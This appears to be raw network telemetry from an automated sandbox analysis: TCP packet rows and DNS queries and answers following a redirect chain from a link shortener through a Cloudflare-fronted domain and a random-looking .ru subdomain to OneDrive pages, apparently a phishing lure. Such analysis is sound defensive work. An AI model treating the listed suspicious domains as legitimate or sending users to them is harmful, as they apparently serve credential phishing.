                                                                              Dec 11, 2024 15:20:00.606239080 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:00.606266975 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:00.606570959 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:00.606945038 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:00.607006073 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:00.607104063 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:00.607189894 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:00.611534119 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:00.611654997 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:00.611687899 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.261459112 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.261528969 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.261562109 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.261590958 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.261624098 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.261694908 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.261756897 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:01.261756897 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:01.261756897 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:01.262187958 CET49737443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:01.262213945 CET44349737104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.264734030 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:01.264786005 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.265168905 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:01.265168905 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:01.265265942 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:01.724033117 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:01.724083900 CET44349739104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:01.724482059 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:01.724482059 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:01.724515915 CET44349739104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:02.492003918 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.492507935 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:02.492544889 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.492887974 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.493284941 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:02.493350029 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.493446112 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:02.535334110 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.944703102 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.944772005 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.944859028 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:02.945359945 CET44349739104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:02.945420980 CET49738443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:20:02.945470095 CET44349738104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:20:02.945898056 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.945916891 CET44349739104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:02.946908951 CET44349739104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:02.946984053 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.947340965 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.947367907 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.947395086 CET44349739104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:02.947418928 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.947448969 CET49739443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.947801113 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.947855949 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:02.947932005 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.948148012 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:02.948164940 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:04.207321882 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:04.207696915 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:04.207724094 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:04.208667994 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:04.208755970 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:04.210093975 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:04.210131884 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:04.210143089 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:04.210192919 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:04.257111073 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:04.257131100 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:04.305233955 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:05.094192982 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:05.094280958 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:05.094430923 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:05.095195055 CET49740443192.168.2.16104.21.32.251
                                                                              Dec 11, 2024 15:20:05.095217943 CET44349740104.21.32.251192.168.2.16
                                                                              Dec 11, 2024 15:20:05.247281075 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:05.247379065 CET44349741172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:05.247471094 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:05.247771025 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:05.247807980 CET44349741172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:06.472923994 CET44349741172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:06.473432064 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.473495960 CET44349741172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:06.474380970 CET44349741172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:06.474461079 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.474739075 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.474776983 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.474813938 CET44349741172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:06.474819899 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.474915028 CET49741443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.475133896 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.475167990 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:06.475248098 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.475439072 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:06.475452900 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:07.687256098 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:07.687650919 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:07.687664032 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:07.688668013 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:07.688747883 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:07.689121962 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:07.689184904 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:07.689291000 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:07.689299107 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:07.735162973 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:08.279495001 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:08.279535055 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:08.279649019 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:08.279850006 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:08.279855013 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:08.635026932 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:08.635135889 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:08.635194063 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:08.636122942 CET49744443192.168.2.16172.67.139.11
                                                                              Dec 11, 2024 15:20:08.636154890 CET44349744172.67.139.11192.168.2.16
                                                                              Dec 11, 2024 15:20:09.856044054 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:09.856385946 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:09.856409073 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:09.857405901 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:09.857479095 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:09.858475924 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:09.858560085 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:09.858743906 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:09.858763933 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:09.903124094 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:10.360991001 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:10.361016989 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:10.361099005 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:10.361157894 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:10.361308098 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:10.361778975 CET49745443192.168.2.1613.107.137.11
                                                                              Dec 11, 2024 15:20:10.361823082 CET4434974513.107.137.11192.168.2.16
                                                                              Dec 11, 2024 15:20:16.724150896 CET49702443192.168.2.1615.236.57.51
                                                                              Dec 11, 2024 15:20:16.724159956 CET4434970215.236.57.51192.168.2.16
                                                                              Dec 11, 2024 15:20:30.094945908 CET49702443192.168.2.1615.236.57.51
                                                                              Dec 11, 2024 15:20:30.095201015 CET4434970215.236.57.51192.168.2.16
                                                                              Dec 11, 2024 15:20:30.095276117 CET49702443192.168.2.1615.236.57.51
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 11, 2024 15:19:28.600719929 CET53620841.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:28.612308025 CET53553921.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:29.262722969 CET5307653192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:29.262855053 CET5012353192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:29.699289083 CET53530761.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:29.699306965 CET53501231.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:31.323108912 CET53610191.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:32.152439117 CET5001653192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:32.152596951 CET5487153192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:32.667164087 CET53500161.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:32.667234898 CET53548711.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:33.154097080 CET5322453192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:33.154226065 CET6283053192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:33.291024923 CET53532241.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:33.292449951 CET53628301.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:34.557853937 CET5745853192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:34.558114052 CET6454853192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:34.885030985 CET53645481.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:34.886156082 CET53574581.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:38.335350990 CET6075753192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:38.335537910 CET5277753192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:38.335962057 CET5673153192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:38.336119890 CET6260153192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:38.336358070 CET6032253192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:38.336460114 CET5331353192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:38.472310066 CET53607571.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:38.472326040 CET53527771.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:38.472656012 CET53567311.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:38.473392010 CET53626011.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:38.473402023 CET53533131.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:38.473409891 CET53603221.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:40.574814081 CET5279653192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:40.574925900 CET5046953192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:40.712209940 CET53527961.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:40.712223053 CET53504691.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:40.733859062 CET6250453192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:40.733973980 CET5234653192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:40.871653080 CET53625041.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:40.871797085 CET53523461.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:42.254236937 CET6191353192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:42.254678011 CET5549253192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:42.269648075 CET5916553192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:42.269797087 CET6048053192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:42.391680956 CET53619131.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:42.392759085 CET53554921.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:42.407094002 CET53604801.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:42.407661915 CET53591651.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:48.202615976 CET53646361.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:49.520689964 CET5969753192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:49.520848036 CET4976653192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:19:49.657437086 CET53596971.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:19:49.657556057 CET53497661.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:20:01.267472029 CET5341853192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:01.267610073 CET5112453192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:01.721769094 CET53511241.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:20:01.723469973 CET53534181.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:20:05.104710102 CET5185753192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:05.104837894 CET5402053192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:05.105026007 CET6345053192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:05.105154991 CET5342853192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:05.242324114 CET53518571.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:20:05.246661901 CET53540201.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:20:07.284862041 CET53605941.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:20:08.098582983 CET6239553192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:08.098726988 CET5511253192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:14.725349903 CET5765453192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:14.725471020 CET5999853192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:14.726393938 CET5424153192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:14.726480007 CET6204253192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:17.700212955 CET5991253192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:17.700355053 CET5800753192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:18.850368977 CET6344153192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:18.850565910 CET5198853192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:21.024492979 CET5711653192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:21.024492979 CET5672053192.168.2.161.1.1.1
                                                                              Dec 11, 2024 15:20:28.441458941 CET53501901.1.1.1192.168.2.16
                                                                              Dec 11, 2024 15:20:30.767342091 CET138138192.168.2.16192.168.2.255
                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                              Dec 11, 2024 15:20:08.718547106 CET192.168.2.161.1.1.1c2d1(Port unreachable)Destination Unreachable
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 11, 2024 15:19:29.262722969 CET192.168.2.161.1.1.10x8842Standard query (0)app.signitic.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:29.262855053 CET192.168.2.161.1.1.10x729fStandard query (0)app.signitic.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:32.152439117 CET192.168.2.161.1.1.10x2d3eStandard query (0)zurl.coA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:32.152596951 CET192.168.2.161.1.1.10xc745Standard query (0)zurl.co65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:33.154097080 CET192.168.2.161.1.1.10x5e65Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:33.154226065 CET192.168.2.161.1.1.10xa4bdStandard query (0)www.google.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:34.557853937 CET192.168.2.161.1.1.10xdca4Standard query (0)fht.lidociou.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:34.558114052 CET192.168.2.161.1.1.10x1174Standard query (0)fht.lidociou.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.335350990 CET192.168.2.161.1.1.10x9d8eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.335537910 CET192.168.2.161.1.1.10x1463Standard query (0)code.jquery.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.335962057 CET192.168.2.161.1.1.10x4932Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.336119890 CET192.168.2.161.1.1.10xf340Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.336358070 CET192.168.2.161.1.1.10x6aefStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.336460114 CET192.168.2.161.1.1.10x5e88Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.574814081 CET192.168.2.161.1.1.10x8cddStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.574925900 CET192.168.2.161.1.1.10x9804Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.733859062 CET192.168.2.161.1.1.10xd263Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.733973980 CET192.168.2.161.1.1.10xa953Standard query (0)code.jquery.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.254236937 CET192.168.2.161.1.1.10xa449Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.254678011 CET192.168.2.161.1.1.10xd314Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.269648075 CET192.168.2.161.1.1.10xe3e1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:42.269797087 CET192.168.2.161.1.1.10x382cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:49.520689964 CET192.168.2.161.1.1.10xf694Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:49.520848036 CET192.168.2.161.1.1.10x351fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:01.267472029 CET192.168.2.161.1.1.10x47f5Standard query (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:01.267610073 CET192.168.2.161.1.1.10xfa13Standard query (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.104710102 CET192.168.2.161.1.1.10x34acStandard query (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.104837894 CET192.168.2.161.1.1.10x79aaStandard query (0)ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.105026007 CET192.168.2.161.1.1.10x1808Standard query (0)www.onedrive.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:05.105154991 CET192.168.2.161.1.1.10x7280Standard query (0)www.onedrive.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.098582983 CET192.168.2.161.1.1.10xfe27Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:08.098726988 CET192.168.2.161.1.1.10x6fa8Standard query (0)onedrive.live.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:14.725349903 CET192.168.2.161.1.1.10xf7efStandard query (0)assets.onestore.msA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:14.725471020 CET192.168.2.161.1.1.10x913cStandard query (0)assets.onestore.ms65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:14.726393938 CET192.168.2.161.1.1.10x6f16Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:14.726480007 CET192.168.2.161.1.1.10xf421Standard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:17.700212955 CET192.168.2.161.1.1.10x762Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:17.700355053 CET192.168.2.161.1.1.10xb65Standard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:18.850368977 CET192.168.2.161.1.1.10x9323Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:18.850565910 CET192.168.2.161.1.1.10x93c4Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:20:21.024492979 CET192.168.2.161.1.1.10x554fStandard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:20:21.024492979 CET192.168.2.161.1.1.10x2c30Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 11, 2024 15:19:29.699289083 CET1.1.1.1192.168.2.160x8842No error (0)app.signitic.com15.236.57.51A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:29.699289083 CET1.1.1.1192.168.2.160x8842No error (0)app.signitic.com15.236.67.128A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:29.699289083 CET1.1.1.1192.168.2.160x8842No error (0)app.signitic.com52.47.126.222A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:32.667164087 CET1.1.1.1192.168.2.160x2d3eNo error (0)zurl.co136.143.187.52A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:33.291024923 CET1.1.1.1192.168.2.160x5e65No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:33.292449951 CET1.1.1.1192.168.2.160xa4bdNo error (0)www.google.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:34.885030985 CET1.1.1.1192.168.2.160x1174No error (0)fht.lidociou.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:34.886156082 CET1.1.1.1192.168.2.160xdca4No error (0)fht.lidociou.com104.21.86.90A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:34.886156082 CET1.1.1.1192.168.2.160xdca4No error (0)fht.lidociou.com172.67.217.51A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.472310066 CET1.1.1.1192.168.2.160x9d8eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.472310066 CET1.1.1.1192.168.2.160x9d8eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.472310066 CET1.1.1.1192.168.2.160x9d8eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.472310066 CET1.1.1.1192.168.2.160x9d8eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.472656012 CET1.1.1.1192.168.2.160x4932No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.472656012 CET1.1.1.1192.168.2.160x4932No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.473392010 CET1.1.1.1192.168.2.160xf340No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.473402023 CET1.1.1.1192.168.2.160x5e88No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.473409891 CET1.1.1.1192.168.2.160x6aefNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:38.473409891 CET1.1.1.1192.168.2.160x6aefNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.712209940 CET1.1.1.1192.168.2.160x8cddNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.712209940 CET1.1.1.1192.168.2.160x8cddNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.712223053 CET1.1.1.1192.168.2.160x9804No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Dec 11, 2024 15:19:40.871653080 CET1.1.1.1192.168.2.160xd263No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
